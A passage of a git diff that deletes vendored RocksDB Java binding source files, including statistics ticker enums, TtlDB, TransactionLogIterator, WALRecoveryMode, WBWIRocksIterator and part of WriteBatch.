-    PERSISTENT_CACHE_MISS((byte) 0x16),
-
-    /**
-     * # total simulation block cache hits
-     */
-    SIM_BLOCK_CACHE_HIT((byte) 0x17),
-
-    /**
-     * # total simulation block cache misses
-     */
-    SIM_BLOCK_CACHE_MISS((byte) 0x18),
-
-    /**
-     * # of memtable hits.
-     */
-    MEMTABLE_HIT((byte) 0x19),
-
-    /**
-     * # of memtable misses.
-     */
-    MEMTABLE_MISS((byte) 0x1A),
-
-    /**
-     * # of Get() queries served by L0
-     */
-    GET_HIT_L0((byte) 0x1B),
-
-    /**
-     * # of Get() queries served by L1
-     */
-    GET_HIT_L1((byte) 0x1C),
-
-    /**
-     * # of Get() queries served by L2 and up
-     */
-    GET_HIT_L2_AND_UP((byte) 0x1D),
-
-    /**
-     * COMPACTION_KEY_DROP_* count the reasons for key drop during compaction
-     * There are 4 reasons currently.
-     */
-
-    /**
-     * key was written with a newer value.
-     */
-    COMPACTION_KEY_DROP_NEWER_ENTRY((byte) 0x1E),
-
-    /**
-     * Also includes keys dropped for range del.
-     * The key is obsolete.
-     */
-    COMPACTION_KEY_DROP_OBSOLETE((byte) 0x1F),
-
-    /**
-     * key was covered by a range tombstone.
-     */
-    COMPACTION_KEY_DROP_RANGE_DEL((byte) 0x20),
-
-    /**
-     * User compaction function has dropped the key.
-     */
-    COMPACTION_KEY_DROP_USER((byte) 0x21),
-
-    /**
-     * all keys in range were deleted.
-     */
-    COMPACTION_RANGE_DEL_DROP_OBSOLETE((byte) 0x22),
-
-    /**
-     * Number of keys written to the database via the Put and Write call's.
-     */
-    NUMBER_KEYS_WRITTEN((byte) 0x23),
-
-    /**
-     * Number of Keys read.
-     */
-    NUMBER_KEYS_READ((byte) 0x24),
-
-    /**
-     * Number keys updated, if inplace update is enabled
-     */
-    NUMBER_KEYS_UPDATED((byte) 0x25),
-
-    /**
-     * The number of uncompressed bytes issued by DB::Put(), DB::Delete(),\
-     * DB::Merge(), and DB::Write().
-     */
-    BYTES_WRITTEN((byte) 0x26),
-
-    /**
-     * The number of uncompressed bytes read from DB::Get().  It could be
-     * either from memtables, cache, or table files.
-     *
-     * For the number of logical bytes read from DB::MultiGet(),
-     * please use {@link #NUMBER_MULTIGET_BYTES_READ}.
-     */
-    BYTES_READ((byte) 0x27),
-
-    /**
-     * The number of calls to seek.
-     */
-    NUMBER_DB_SEEK((byte) 0x28),
-
-    /**
-     * The number of calls to next.
-     */
-    NUMBER_DB_NEXT((byte) 0x29),
-
-    /**
-     * The number of calls to prev.
-     */
-    NUMBER_DB_PREV((byte) 0x2A),
-
-    /**
-     * The number of calls to seek that returned data.
-     */
-    NUMBER_DB_SEEK_FOUND((byte) 0x2B),
-
-    /**
-     * The number of calls to next that returned data.
-     */
-    NUMBER_DB_NEXT_FOUND((byte) 0x2C),
-
-    /**
-     * The number of calls to prev that returned data.
-     */
-    NUMBER_DB_PREV_FOUND((byte) 0x2D),
-
-    /**
-     * The number of uncompressed bytes read from an iterator.
-     * Includes size of key and value.
-     */
-    ITER_BYTES_READ((byte) 0x2E),
-
-    NO_FILE_CLOSES((byte) 0x2F),
-
-    NO_FILE_OPENS((byte) 0x30),
-
-    NO_FILE_ERRORS((byte) 0x31),
-
-    /**
-     * Time system had to wait to do LO-L1 compactions.
-     *
-     * @deprecated
-     */
-    @Deprecated
-    STALL_L0_SLOWDOWN_MICROS((byte) 0x32),
-
-    /**
-     * Time system had to wait to move memtable to L1.
-     *
-     * @deprecated
-     */
-    @Deprecated
-    STALL_MEMTABLE_COMPACTION_MICROS((byte) 0x33),
-
-    /**
-     * write throttle because of too many files in L0.
-     *
-     * @deprecated
-     */
-    @Deprecated
-    STALL_L0_NUM_FILES_MICROS((byte) 0x34),
-
-    /**
-     * Writer has to wait for compaction or flush to finish.
-     */
-    STALL_MICROS((byte) 0x35),
-
-    /**
-     * The wait time for db mutex.
-     *
-     * Disabled by default. To enable it set stats level to {@link StatsLevel#ALL}
-     */
-    DB_MUTEX_WAIT_MICROS((byte) 0x36),
-
-    RATE_LIMIT_DELAY_MILLIS((byte) 0x37),
-
-    /**
-     * Number of iterators currently open.
-     */
-    NO_ITERATORS((byte) 0x38),
-
-    /**
-     * Number of MultiGet calls.
-     */
-    NUMBER_MULTIGET_CALLS((byte) 0x39),
-
-    /**
-     * Number of MultiGet keys read.
-     */
-    NUMBER_MULTIGET_KEYS_READ((byte) 0x3A),
-
-    /**
-     * Number of MultiGet bytes read.
-     */
-    NUMBER_MULTIGET_BYTES_READ((byte) 0x3B),
-
-    /**
-     * Number of deletes records that were not required to be
-     * written to storage because key does not exist.
-     */
-    NUMBER_FILTERED_DELETES((byte) 0x3C),
-    NUMBER_MERGE_FAILURES((byte) 0x3D),
-
-    /**
-     * Number of times bloom was checked before creating iterator on a
-     * file, and the number of times the check was useful in avoiding
-     * iterator creation (and thus likely IOPs).
-     */
-    BLOOM_FILTER_PREFIX_CHECKED((byte) 0x3E),
-    BLOOM_FILTER_PREFIX_USEFUL((byte) 0x3F),
-
-    /**
-     * Number of times we had to reseek inside an iteration to skip
-     * over large number of keys with same userkey.
-     */
-    NUMBER_OF_RESEEKS_IN_ITERATION((byte) 0x40),
-
-    /**
-     * Record the number of calls to {@link RocksDB#getUpdatesSince(long)}. Useful to keep track of
-     * transaction log iterator refreshes.
-     */
-    GET_UPDATES_SINCE_CALLS((byte) 0x41),
-
-    /**
-     * Miss in the compressed block cache.
-     */
-    BLOCK_CACHE_COMPRESSED_MISS((byte) 0x42),
-
-    /**
-     * Hit in the compressed block cache.
-     */
-    BLOCK_CACHE_COMPRESSED_HIT((byte) 0x43),
-
-    /**
-     * Number of blocks added to compressed block cache.
-     */
-    BLOCK_CACHE_COMPRESSED_ADD((byte) 0x44),
-
-    /**
-     * Number of failures when adding blocks to compressed block cache.
-     */
-    BLOCK_CACHE_COMPRESSED_ADD_FAILURES((byte) 0x45),
-
-    /**
-     * Number of times WAL sync is done.
-     */
-    WAL_FILE_SYNCED((byte) 0x46),
-
-    /**
-     * Number of bytes written to WAL.
-     */
-    WAL_FILE_BYTES((byte) 0x47),
-
-    /**
-     * Writes can be processed by requesting thread or by the thread at the
-     * head of the writers queue.
-     */
-    WRITE_DONE_BY_SELF((byte) 0x48),
-
-    /**
-     * Equivalent to writes done for others.
-     */
-    WRITE_DONE_BY_OTHER((byte) 0x49),
-
-    /**
-     * Number of writes ending up with timed-out.
-     */
-    WRITE_TIMEDOUT((byte) 0x4A),
-
-    /**
-     * Number of Write calls that request WAL.
-     */
-    WRITE_WITH_WAL((byte) 0x4B),
-
-    /**
-     * Bytes read during compaction.
-     */
-    COMPACT_READ_BYTES((byte) 0x4C),
-
-    /**
-     * Bytes written during compaction.
-     */
-    COMPACT_WRITE_BYTES((byte) 0x4D),
-
-    /**
-     * Bytes written during flush.
-     */
-    FLUSH_WRITE_BYTES((byte) 0x4E),
-
-    /**
-     * Number of table's properties loaded directly from file, without creating
-     * table reader object.
-     */
-    NUMBER_DIRECT_LOAD_TABLE_PROPERTIES((byte) 0x4F),
-    NUMBER_SUPERVERSION_ACQUIRES((byte) 0x50),
-    NUMBER_SUPERVERSION_RELEASES((byte) 0x51),
-    NUMBER_SUPERVERSION_CLEANUPS((byte) 0x52),
-
-    /**
-     * # of compressions/decompressions executed
-     */
-    NUMBER_BLOCK_COMPRESSED((byte) 0x53),
-    NUMBER_BLOCK_DECOMPRESSED((byte) 0x54),
-
-    NUMBER_BLOCK_NOT_COMPRESSED((byte) 0x55),
-    MERGE_OPERATION_TOTAL_TIME((byte) 0x56),
-    FILTER_OPERATION_TOTAL_TIME((byte) 0x57),
-
-    /**
-     * Row cache.
-     */
-    ROW_CACHE_HIT((byte) 0x58),
-    ROW_CACHE_MISS((byte) 0x59),
-
-    /**
-     * Read amplification statistics.
-     *
-     * Read amplification can be calculated using this formula
-     * (READ_AMP_TOTAL_READ_BYTES / READ_AMP_ESTIMATE_USEFUL_BYTES)
-     *
-     * REQUIRES: ReadOptions::read_amp_bytes_per_bit to be enabled
-     */
-
-    /**
-     * Estimate of total bytes actually used.
-     */
-    READ_AMP_ESTIMATE_USEFUL_BYTES((byte) 0x5A),
-
-    /**
-     * Total size of loaded data blocks.
-     */
-    READ_AMP_TOTAL_READ_BYTES((byte) 0x5B),
-
-    /**
-     * Number of refill intervals where rate limiter's bytes are fully consumed.
-     */
-    NUMBER_RATE_LIMITER_DRAINS((byte) 0x5C),
-
-    TICKER_ENUM_MAX((byte) 0x5D);
-
-
-    private final byte value;
-
-    TickerType(final byte value) {
-        this.value = value;
-    }
-
-    public byte getValue() {
-        return value;
-    }
-}
diff --git a/thirdparty/rocksdb/java/src/main/java/org/rocksdb/TransactionLogIterator.java b/thirdparty/rocksdb/java/src/main/java/org/rocksdb/TransactionLogIterator.java
deleted file mode 100644
index b6bfc49..0000000
--- a/thirdparty/rocksdb/java/src/main/java/org/rocksdb/TransactionLogIterator.java
+++ /dev/null
@@ -1,111 +0,0 @@
-package org.rocksdb;
-
-/**
- * <p>A TransactionLogIterator is used to iterate over the transactions in a db.
- * One run of the iterator is continuous, i.e. the iterator will stop at the
- * beginning of any gap in sequences.</p>
- */
-public class TransactionLogIterator extends RocksObject {
-
-  /**
-   * <p>An iterator is either positioned at a WriteBatch
-   * or not valid. This method returns true if the iterator
-   * is valid. Can read data from a valid iterator.</p>
-   *
-   * @return true if iterator position is valid.
-   */
-  public boolean isValid() {
-    return isValid(nativeHandle_);
-  }
-
-  /**
-   * <p>Moves the iterator to the next WriteBatch.
-   * <strong>REQUIRES</strong>: Valid() to be true.</p>
-   */
-  public void next() {
-    next(nativeHandle_);
-  }
-
-  /**
-   * <p>Throws RocksDBException if something went wrong.</p>
-   *
-   * @throws org.rocksdb.RocksDBException if something went
-   *     wrong in the underlying C++ code.
-   */
-  public void status() throws RocksDBException {
-    status(nativeHandle_);
-  }
-
-  /**
-   * <p>If iterator position is valid, return the current
-   * write_batch and the sequence number of the earliest
-   * transaction contained in the batch.</p>
-   *
-   * <p>ONLY use if Valid() is true and status() is OK.</p>
-   *
-   * @return {@link org.rocksdb.TransactionLogIterator.BatchResult}
-   *     instance.
-   */
-  public BatchResult getBatch() {
-    assert(isValid());
-    return getBatch(nativeHandle_);
-  }
-
-  /**
-   * <p>TransactionLogIterator constructor.</p>
-   *
-   * @param nativeHandle address to native address.
-   */
-  TransactionLogIterator(final long nativeHandle) {
-    super(nativeHandle);
-  }
-
-  /**
-   * <p>BatchResult represents a data structure returned
-   * by a TransactionLogIterator containing a sequence
-   * number and a {@link WriteBatch} instance.</p>
-   */
-  public static final class BatchResult {
-    /**
-     * <p>Constructor of BatchResult class.</p>
-     *
-     * @param sequenceNumber related to this BatchResult instance.
-     * @param nativeHandle to {@link org.rocksdb.WriteBatch}
-     *     native instance.
-     */
-    public BatchResult(final long sequenceNumber,
-        final long nativeHandle) {
-      sequenceNumber_ = sequenceNumber;
-      writeBatch_ = new WriteBatch(nativeHandle, true);
-    }
-
-    /**
-     * <p>Return sequence number related to this BatchResult.</p>
-     *
-     * @return Sequence number.
-     */
-    public long sequenceNumber() {
-      return sequenceNumber_;
-    }
-
-    /**
-     * <p>Return contained {@link org.rocksdb.WriteBatch}
-     * instance</p>
-     *
-     * @return {@link org.rocksdb.WriteBatch} instance.
-     */
-    public WriteBatch writeBatch() {
-      return writeBatch_;
-    }
-
-    private final long sequenceNumber_;
-    private final WriteBatch writeBatch_;
-  }
-
-  @Override protected final native void disposeInternal(final long handle);
-  private native boolean isValid(long handle);
-  private native void next(long handle);
-  private native void status(long handle)
-      throws RocksDBException;
-  private native BatchResult getBatch(long handle);
-}
diff --git a/thirdparty/rocksdb/java/src/main/java/org/rocksdb/TtlDB.java b/thirdparty/rocksdb/java/src/main/java/org/rocksdb/TtlDB.java
deleted file mode 100644
index 740f512..0000000
--- a/thirdparty/rocksdb/java/src/main/java/org/rocksdb/TtlDB.java
+++ /dev/null
@@ -1,211 +0,0 @@
-// Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-
-package org.rocksdb;
-
-import java.util.List;
-
-/**
- * Database with TTL support.
- *
- * <p><strong>Use case</strong></p>
- * <p>This API should be used to open the db when key-values inserted are
- * meant to be removed from the db in a non-strict 'ttl' amount of time
- * Therefore, this guarantees that key-values inserted will remain in the
- * db for &gt;= ttl amount of time and the db will make efforts to remove the
- * key-values as soon as possible after ttl seconds of their insertion.
- * </p>
- *
- * <p><strong>Behaviour</strong></p>
- * <p>TTL is accepted in seconds
- * (int32_t)Timestamp(creation) is suffixed to values in Put internally
- * Expired TTL values deleted in compaction only:(Timestamp+ttl&lt;time_now)
- * Get/Iterator may return expired entries(compaction not run on them yet)
- * Different TTL may be used during different Opens
- * </p>
- *
- * <p><strong>Example</strong></p>
- * <ul>
- * <li>Open1 at t=0 with ttl=4 and insert k1,k2, close at t=2</li>
- * <li>Open2 at t=3 with ttl=5. Now k1,k2 should be deleted at t&gt;=5</li>
- * </ul>
- *
- * <p>
- * read_only=true opens in the usual read-only mode. Compactions will not be
- *  triggered(neither manual nor automatic), so no expired entries removed
- * </p>
- *
- * <p><strong>Constraints</strong></p>
- * <p>Not specifying/passing or non-positive TTL behaves
- * like TTL = infinity</p>
- *
- * <p><strong>!!!WARNING!!!</strong></p>
- * <p>Calling DB::Open directly to re-open a db created by this API will get
- * corrupt values(timestamp suffixed) and no ttl effect will be there
- * during the second Open, so use this API consistently to open the db
- * Be careful when passing ttl with a small positive value because the
- * whole database may be deleted in a small amount of time.</p>
- */
-public class TtlDB extends RocksDB {
-
-  /**
-   * <p>Opens a TtlDB.</p>
-   *
-   * <p>Database is opened in read-write mode without default TTL.</p>
-   *
-   * @param options {@link org.rocksdb.Options} instance.
-   * @param db_path path to database.
-   *
-   * @return TtlDB instance.
-   *
-   * @throws RocksDBException thrown if an error occurs within the native
-   *     part of the library.
-   */
-  public static TtlDB open(final Options options, final String db_path)
-      throws RocksDBException {
-    return open(options, db_path, 0, false);
-  }
-
-  /**
-   * <p>Opens a TtlDB.</p>
-   *
-   * @param options {@link org.rocksdb.Options} instance.
-   * @param db_path path to database.
-   * @param ttl time to live for new entries.
-   * @param readOnly boolean value indicating if database if db is
-   *     opened read-only.
-   *
-   * @return TtlDB instance.
-   *
-   * @throws RocksDBException thrown if an error occurs within the native
-   *     part of the library.
-   */
-  public static TtlDB open(final Options options, final String db_path,
-      final int ttl, final boolean readOnly) throws RocksDBException {
-    return new TtlDB(open(options.nativeHandle_, db_path, ttl, readOnly));
-  }
-
-  /**
-   * <p>Opens a TtlDB.</p>
-   *
-   * @param options {@link org.rocksdb.Options} instance.
-   * @param db_path path to database.
-   * @param columnFamilyDescriptors list of column family descriptors
-   * @param columnFamilyHandles will be filled with ColumnFamilyHandle instances
-   *     on open.
-   * @param ttlValues time to live values per column family handle
-   * @param readOnly boolean value indicating if database if db is
-   *     opened read-only.
-   *
-   * @return TtlDB instance.
-   *
-   * @throws RocksDBException thrown if an error occurs within the native
-   *     part of the library.
-   * @throws java.lang.IllegalArgumentException when there is not a ttl value
-   *     per given column family handle.
-   */
-  public static TtlDB open(final DBOptions options, final String db_path,
-      final List<ColumnFamilyDescriptor> columnFamilyDescriptors,
-      final List<ColumnFamilyHandle> columnFamilyHandles,
-      final List<Integer> ttlValues, final boolean readOnly)
-      throws RocksDBException {
-    if (columnFamilyDescriptors.size() != ttlValues.size()) {
-      throw new IllegalArgumentException("There must be a ttl value per column"
-          + "family handle.");
-    }
-
-    final byte[][] cfNames = new byte[columnFamilyDescriptors.size()][];
-    final long[] cfOptionHandles = new long[columnFamilyDescriptors.size()];
-    for (int i = 0; i < columnFamilyDescriptors.size(); i++) {
-      final ColumnFamilyDescriptor cfDescriptor =
-          columnFamilyDescriptors.get(i);
-      cfNames[i] = cfDescriptor.columnFamilyName();
-      cfOptionHandles[i] = cfDescriptor.columnFamilyOptions().nativeHandle_;
-    }
-
-    final int ttlVals[] = new int[ttlValues.size()];
-    for(int i = 0; i < ttlValues.size(); i++) {
-      ttlVals[i] = ttlValues.get(i);
-    }
-    final long[] handles = openCF(options.nativeHandle_, db_path,
-            cfNames, cfOptionHandles, ttlVals, readOnly);
-
-    final TtlDB ttlDB = new TtlDB(handles[0]);
-    for (int i = 1; i < handles.length; i++) {
-      columnFamilyHandles.add(new ColumnFamilyHandle(ttlDB, handles[i]));
-    }
-    return ttlDB;
-  }
-
-  /**
-   * <p>Creates a new ttl based column family with a name defined
-   * in given ColumnFamilyDescriptor and allocates a
-   * ColumnFamilyHandle within an internal structure.</p>
-   *
-   * <p>The ColumnFamilyHandle is automatically disposed with DB
-   * disposal.</p>
-   *
-   * @param columnFamilyDescriptor column family to be created.
-   * @param ttl TTL to set for this column family.
-   *
-   * @return {@link org.rocksdb.ColumnFamilyHandle} instance.
-   *
-   * @throws RocksDBException thrown if error happens in underlying
-   *    native library.
-   */
-  public ColumnFamilyHandle createColumnFamilyWithTtl(
-      final ColumnFamilyDescriptor columnFamilyDescriptor,
-      final int ttl) throws RocksDBException {
-    return new ColumnFamilyHandle(this,
-        createColumnFamilyWithTtl(nativeHandle_,
-            columnFamilyDescriptor.columnFamilyName(),
-            columnFamilyDescriptor.columnFamilyOptions().nativeHandle_, ttl));
-  }
-
-  /**
-   * <p>Close the TtlDB instance and release resource.</p>
-   *
-   * <p>Internally, TtlDB owns the {@code rocksdb::DB} pointer
-   * to its associated {@link org.rocksdb.RocksDB}. The release
-   * of that RocksDB pointer is handled in the destructor of the
-   * c++ {@code rocksdb::TtlDB} and should be transparent to
-   * Java developers.</p>
-   */
-  @Override
-  public void close() {
-      super.close();
-  }
-
-  /**
-   * <p>A protected constructor that will be used in the static
-   * factory method
-   * {@link #open(Options, String, int, boolean)}
-   * and
-   * {@link #open(DBOptions, String, java.util.List, java.util.List,
-   * java.util.List, boolean)}.
-   * </p>
-   *
-   * @param nativeHandle The native handle of the C++ TtlDB object
-   */
-  protected TtlDB(final long nativeHandle) {
-    super(nativeHandle);
-  }
-
-  @Override protected void finalize() throws Throwable {
-    close(); //TODO(AR) revisit here when implementing AutoCloseable
-    super.finalize();
-  }
-
-  private native static long open(final long optionsHandle,
-      final String db_path, final int ttl, final boolean readOnly)
-      throws RocksDBException;
-  private native static long[] openCF(final long optionsHandle,
-      final String db_path, final byte[][] columnFamilyNames,
-      final long[] columnFamilyOptions, final int[] ttlValues,
-      final boolean readOnly) throws RocksDBException;
-  private native long createColumnFamilyWithTtl(final long handle,
-      final byte[] columnFamilyName, final long columnFamilyOptions, int ttl)
-      throws RocksDBException;
-}
diff --git a/thirdparty/rocksdb/java/src/main/java/org/rocksdb/VectorMemTableConfig.java b/thirdparty/rocksdb/java/src/main/java/org/rocksdb/VectorMemTableConfig.java
deleted file mode 100644
index 3783402..0000000
--- a/thirdparty/rocksdb/java/src/main/java/org/rocksdb/VectorMemTableConfig.java
+++ /dev/null
@@ -1,45 +0,0 @@
-package org.rocksdb;
-
-/**
- * The config for vector memtable representation.
- */
-public class VectorMemTableConfig extends MemTableConfig {
-  public static final int DEFAULT_RESERVED_SIZE = 0;
-
-  /**
-   * VectorMemTableConfig constructor
-   */
-  public VectorMemTableConfig() {
-    reservedSize_ = DEFAULT_RESERVED_SIZE;
-  }
-
-  /**
-   * Set the initial size of the vector that will be used
-   * by the memtable created based on this config.
-   *
-   * @param size the initial size of the vector.
-   * @return the reference to the current config.
-   */
-  public VectorMemTableConfig setReservedSize(final int size) {
-    reservedSize_ = size;
-    return this;
-  }
-
-  /**
-   * Returns the initial size of the vector used by the memtable
-   * created based on this config.
-   *
-   * @return the initial size of the vector.
-   */
-  public int reservedSize() {
-    return reservedSize_;
-  }
-
-  @Override protected long newMemTableFactoryHandle() {
-    return newMemTableFactoryHandle(reservedSize_);
-  }
-
-  private native long newMemTableFactoryHandle(long reservedSize)
-      throws IllegalArgumentException;
-  private int reservedSize_;
-}
diff --git a/thirdparty/rocksdb/java/src/main/java/org/rocksdb/WALRecoveryMode.java b/thirdparty/rocksdb/java/src/main/java/org/rocksdb/WALRecoveryMode.java
deleted file mode 100644
index d3fc47b..0000000
--- a/thirdparty/rocksdb/java/src/main/java/org/rocksdb/WALRecoveryMode.java
+++ /dev/null
@@ -1,83 +0,0 @@
-// Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-
-package org.rocksdb;
-
-/**
- * The WAL Recover Mode
- */
-public enum WALRecoveryMode {
-
-  /**
-   * Original levelDB recovery
-   *
-   * We tolerate incomplete record in trailing data on all logs
-   * Use case : This is legacy behavior (default)
-   */
-  TolerateCorruptedTailRecords((byte)0x00),
-
-  /**
-   * Recover from clean shutdown
-   *
-   * We don't expect to find any corruption in the WAL
-   * Use case : This is ideal for unit tests and rare applications that
-   * can require high consistency guarantee
-   */
-  AbsoluteConsistency((byte)0x01),
-
-  /**
-   * Recover to point-in-time consistency
-   * We stop the WAL playback on discovering WAL inconsistency
-   * Use case : Ideal for systems that have disk controller cache like
-   * hard disk, SSD without super capacitor that store related data
-   */
-  PointInTimeRecovery((byte)0x02),
-
-  /**
-   * Recovery after a disaster
-   * We ignore any corruption in the WAL and try to salvage as much data as
-   * possible
-   * Use case : Ideal for last ditch effort to recover data or systems that
-   * operate with low grade unrelated data
-   */
-  SkipAnyCorruptedRecords((byte)0x03);
-
-  private byte value;
-
-  WALRecoveryMode(final byte value) {
-    this.value = value;
-  }
-
-  /**
-   * <p>Returns the byte value of the enumerations value.</p>
-   *
-   * @return byte representation
-   */
-  public byte getValue() {
-    return value;
-  }
-
-  /**
-   * <p>Get the WALRecoveryMode enumeration value by
-   * passing the byte identifier to this method.</p>
-   *
-   * @param byteIdentifier of WALRecoveryMode.
-   *
-   * @return CompressionType instance.
-   *
-   * @throws IllegalArgumentException If WALRecoveryMode cannot be found for the
-   *   provided byteIdentifier
-   */
-  public static WALRecoveryMode getWALRecoveryMode(final byte byteIdentifier) {
-    for (final WALRecoveryMode walRecoveryMode : WALRecoveryMode.values()) {
-      if (walRecoveryMode.getValue() == byteIdentifier) {
-        return walRecoveryMode;
-      }
-    }
-
-    throw new IllegalArgumentException(
-        "Illegal value provided for WALRecoveryMode.");
-  }
-}
diff --git a/thirdparty/rocksdb/java/src/main/java/org/rocksdb/WBWIRocksIterator.java b/thirdparty/rocksdb/java/src/main/java/org/rocksdb/WBWIRocksIterator.java
deleted file mode 100644
index d45da2b..0000000
--- a/thirdparty/rocksdb/java/src/main/java/org/rocksdb/WBWIRocksIterator.java
+++ /dev/null
@@ -1,184 +0,0 @@
-// Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-
-package org.rocksdb;
-
-public class WBWIRocksIterator
-    extends AbstractRocksIterator<WriteBatchWithIndex> {
-  private final WriteEntry entry = new WriteEntry();
-
-  protected WBWIRocksIterator(final WriteBatchWithIndex wbwi,
-      final long nativeHandle) {
-    super(wbwi, nativeHandle);
-  }
-
-  /**
-   * Get the current entry
-   *
-   * The WriteEntry is only valid
-   * until the iterator is repositioned.
-   * If you want to keep the WriteEntry across iterator
-   * movements, you must make a copy of its data!
-   *
-   * Note - This method is not thread-safe with respect to the WriteEntry
-   * as it performs a non-atomic update across the fields of the WriteEntry
-   *
-   * @return The WriteEntry of the current entry
-   */
-  public WriteEntry entry() {
-    assert(isOwningHandle());
-    final long ptrs[] = entry1(nativeHandle_);
-
-    entry.type = WriteType.fromId((byte)ptrs[0]);
-    entry.key.resetNativeHandle(ptrs[1], ptrs[1] != 0);
-    entry.value.resetNativeHandle(ptrs[2], ptrs[2] != 0);
-
-    return entry;
-  }
-
-  @Override protected final native void disposeInternal(final long handle);
-  @Override final native boolean isValid0(long handle);
-  @Override final native void seekToFirst0(long handle);
-  @Override final native void seekToLast0(long handle);
-  @Override final native void next0(long handle);
-  @Override final native void prev0(long handle);
-  @Override final native void seek0(long handle, byte[] target, int targetLen);
-  @Override final native void status0(long handle) throws RocksDBException;
-
-  private native long[] entry1(final long handle);
-
-  /**
-   * Enumeration of the Write operation
-   * that created the record in the Write Batch
-   */
-  public enum WriteType {
-    PUT((byte)0x1),
-    MERGE((byte)0x2),
-    DELETE((byte)0x4),
-    LOG((byte)0x8);
-
-    final byte id;
-    WriteType(final byte id) {
-      this.id = id;
-    }
-
-    public static WriteType fromId(final byte id) {
-      for(final WriteType wt : WriteType.values()) {
-        if(id == wt.id) {
-          return wt;
-        }
-      }
-      throw new IllegalArgumentException("No WriteType with id=" + id);
-    }
-  }
-
-  @Override
-  public void close() {
-    entry.close();
-    super.close();
-  }
-
-  /**
-   * Represents an entry returned by
-   * {@link org.rocksdb.WBWIRocksIterator#entry()}
-   *
-   * It is worth noting that a WriteEntry with
-   * the type {@link org.rocksdb.WBWIRocksIterator.WriteType#DELETE}
-   * or {@link org.rocksdb.WBWIRocksIterator.WriteType#LOG}
-   * will not have a value.
-   */
-  public static class WriteEntry implements AutoCloseable {
-    WriteType type = null;
-    final DirectSlice key;
-    final DirectSlice value;
-
-    /**
-     * Intentionally private as this
-     * should only be instantiated in
-     * this manner by the outer WBWIRocksIterator
-     * class; The class members are then modified
-     * by calling {@link org.rocksdb.WBWIRocksIterator#entry()}
-     */
-    private WriteEntry() {
-      key = new DirectSlice();
-      value = new DirectSlice();
-    }
-
-    public WriteEntry(final WriteType type, final DirectSlice key,
-        final DirectSlice value) {
-      this.type = type;
-      this.key = key;
-      this.value = value;
-    }
-
-    /**
-     * Returns the type of the Write Entry
-     *
-     * @return the WriteType of the WriteEntry
-     */
-    public WriteType getType() {
-      return type;
-    }
-
-    /**
-     * Returns the key of the Write Entry
-     *
-     * @return The slice containing the key
-     * of the WriteEntry
-     */
-    public DirectSlice getKey() {
-      return key;
-    }
-
-    /**
-     * Returns the value of the Write Entry
-     *
-     * @return The slice containing the value of
-     * the WriteEntry or null if the WriteEntry has
-     * no value
-     */
-    public DirectSlice getValue() {
-      if(!value.isOwningHandle()) {
-        return null; //TODO(AR) migrate to JDK8 java.util.Optional#empty()
-      } else {
-        return value;
-      }
-    }
-
-    /**
-     * Generates a hash code for the Write Entry. NOTE: The hash code is based
-     * on the string representation of the key, so it may not work correctly
-     * with exotic custom comparators.
-     *
-     * @return The hash code for the Write Entry
-     */
-    @Override
-    public int hashCode() {
-      return (key == null) ? 0 : key.hashCode();
-    }
-
-    @Override
-    public boolean equals(final Object other) {
-      if(other == null) {
-        return false;
-      } else if (this == other) {
-        return true;
-      } else if(other instanceof WriteEntry) {
-        final WriteEntry otherWriteEntry = (WriteEntry)other;
-        return type.equals(otherWriteEntry.type)
-            && key.equals(otherWriteEntry.key)
-            && value.equals(otherWriteEntry.value);
-      } else {
-        return false;
-      }
-    }
-
-    @Override
-    public void close() {
-      value.close();
-      key.close();
-    }
-  }
-}
diff --git a/thirdparty/rocksdb/java/src/main/java/org/rocksdb/WriteBatch.java b/thirdparty/rocksdb/java/src/main/java/org/rocksdb/WriteBatch.java
deleted file mode 100644
index 272e9b4..0000000
--- a/thirdparty/rocksdb/java/src/main/java/org/rocksdb/WriteBatch.java
+++ /dev/null
@@ -1,153 +0,0 @@
-// Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-
-package org.rocksdb;
-
-/**
- * WriteBatch holds a collection of updates to apply atomically to a DB.
- *
- * The updates are applied in the order in which they are added
- * to the WriteBatch.  For example, the value of "key" will be "v3"
- * after the following batch is written:
- *
- *    batch.put("key", "v1");
- *    batch.remove("key");
- *    batch.put("key", "v2");
- *    batch.put("key", "v3");
- *
- * Multiple threads can invoke const methods on a WriteBatch without
- * external synchronization, but if any of the threads may call a
- * non-const method, all threads accessing the same WriteBatch must use
- * external synchronization.
- */
-public class WriteBatch extends AbstractWriteBatch {
-  /**
-   * Constructs a WriteBatch instance.
-   */
-  public WriteBatch() {
-    this(0);
-  }
-
-  /**
-   * Constructs a WriteBatch instance with a given size.
-   *
-   * @param reserved_bytes reserved size for WriteBatch
-   */
-  public WriteBatch(final int reserved_bytes) {
-    super(newWriteBatch(reserved_bytes));
-  }
-
-  /**
-   * Support for iterating over the contents of a batch.
-   *
-   * @param handler A handler that is called back for each
-   *                update present in the batch
-   *
-   * @throws RocksDBException If we cannot iterate over the batch
-   */
-  public void iterate(final Handler handler) throws RocksDBException {
-    iterate(nativeHandle_, handler.nativeHandle_);
-  }
-
-  /**
-   * <p>Private WriteBatch constructor which is used to construct
-   * WriteBatch instances from C++ side. As the reference to this
-   * object is also managed from C++ side the handle will be disowned.</p>
-   *
-   * @param nativeHandle address of native instance.
-   */
-  WriteBatch(final long nativeHandle) {
-    this(nativeHandle, false);
-  }
-
-  /**
-   * <p>Private WriteBatch constructor which is used to construct
-   * WriteBatch instances. </p>
-   *
-   * @param nativeHandle address of native instance.
-   * @param owningNativeHandle whether to own this reference from the C++ side or not
-   */
-  WriteBatch(final long nativeHandle, final boolean owningNativeHandle) {
-    super(nativeHandle);
-    if(!owningNativeHandle)
-      disOwnNativeHandle();
-  }
-
-  @Override protected final native void disposeInternal(final long handle);
-  @Override final native int count0(final long handle);
-  @Override final native void put(final long handle, final byte[] key,
-      final int keyLen, final byte[] value, final int valueLen);
-  @Override final native void put(final long handle, final byte[] key,
